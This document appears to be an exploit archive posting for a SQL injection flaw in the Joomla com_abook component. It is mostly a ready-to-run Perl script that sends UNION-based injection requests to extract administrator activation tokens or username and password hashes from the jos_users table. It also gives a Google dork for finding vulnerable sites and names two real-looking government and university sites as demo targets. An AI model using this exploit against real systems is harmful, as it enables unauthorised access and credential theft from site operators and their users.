###
# Title : Exploit Joomla com_abook Sql Injection
# Author : Dz MinD Injector
# Home : Algeria 23000 d^_^b
# FaCeb0ok : https://www.facebook.com/Dz.MinD.Injector
# Type : proof of concept
# Tested on : Windows7 & Linux
# Date : 24/01/2016
# Vendor Homepage : www.joomla.com
###
# <?php
# echo " Freedom t0 Palastine " ;
# ?>
# Lov3 Explo8ting Just For Fun !
######## [ Proof / Exploit ] ################|=>
#! Google Dork :
#+ inurl:/index.php?option=com_abook
# Demo :
http://www.luas.gov.my/
http://www.unisza.edu.my/perpustakaan/
#!/usr/bin/perl
use IO::Socket::INET;
use LWP::UserAgent;
system("clear");
print "------------------------------------------------------------------------\n";
print "########################################################################\n";
print "# Joomla com_abook Remote Sql Injection #\n";
print "# #\n";
print "# Author: Dz MinD Injector #\n";
print "# #\n";
print "# Greetz: Sige-Dz & Anon Jok & All Algerian HackerZ #\n";
print "########################################################################\n";
print "------------------------------------------------------------------------\n\n";
$target = $ARGV[0];
$component = $ARGV[1];
if($target eq '' || $component eq '')
{
print "Usage: ./exploit.pl <target> <Method Number> \n";
print "-----------------------------------\n";
print " Available Methods : \n";
print " 1- Get Activation Token Admin \n";
print " 2- Admin Hash \n";
print "-----------------------------------\n";
print " Example: ./exploit.pl http://www.site.com/ 1 \n\n";
exit(1);
}
open(FILE, "> contents11.txt");
if($target !~ /http:///)
{
$target = "http://$target";
}
sleep 1.5;
$agent = LWP::UserAgent->new();
$agent->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1');
if($component == 1)
{
$host = $target . "index.php?option=com_abook&view=author&id=112&Itemid=409/**/ AND /**/ 1=0 /**/ UNION /**/ ALL /**/ SELECT /**/ 1, /**/ 2, /**/ version(),/**/ 4, /**/ group_concat(activation,0x3a), /**/ 6, /**/ 7, /**/ 8, /**/ 9,/**/ 10, /**/ 11, /**/ 12, /**/ 13, /**/ 14, /**/ 15, /**/ 16, /**/ 17, /**/ 18,/**/ 19, /**/ 20, /**/ 21, /**/ 22, /**/23, /**/ 24, /**/ 25, /**/ 26, /**/ 27, /**/ 28, /**/ 29, /**/ 30, /**/ 31, /**/ 32 from+jos_users--";
print " . . Try to fond Activation Token Admin .. from $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Activation Token Admin Injected d^_^b --> $password
.\n\n";
sleep 1;
}
else
{
print "[-] Activation Token Admin not found T_T
. \n\n";
}
}
if($component == 2)
{
$host = $target . "index.php?option=com_abook&view=author&id=112&Itemid=409/**/ AND /**/ 1=0 /**/ UNION /**/ ALL /**/ SELECT /**/ 1, /**/ 2, /**/ version(),/**/ 4, /**/ group_concat(username,0x3a,password), /**/ 6, /**/ 7, /**/ 8, /**/ 9,/**/ 10, /**/ 11, /**/ 12, /**/ 13, /**/ 14, /**/ 15, /**/ 16, /**/ 17, /**/ 18,/**/ 19, /**/ 20, /**/ 21, /**/ 22, /**/23, /**/ 24, /**/ 25, /**/ 26, /**/ 27, /**/ 28, /**/ 29, /**/ 30, /**/ 31, /**/ 32 from+jos_users--";
print " . . Retrieving Databasee... from $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Admin Hash d^_^b :
--> $password
.\n\n";
sleep 1;
}
else
{
print "[-] i'm Sorry traget not vulnerable T_T
. \n\n";
}
}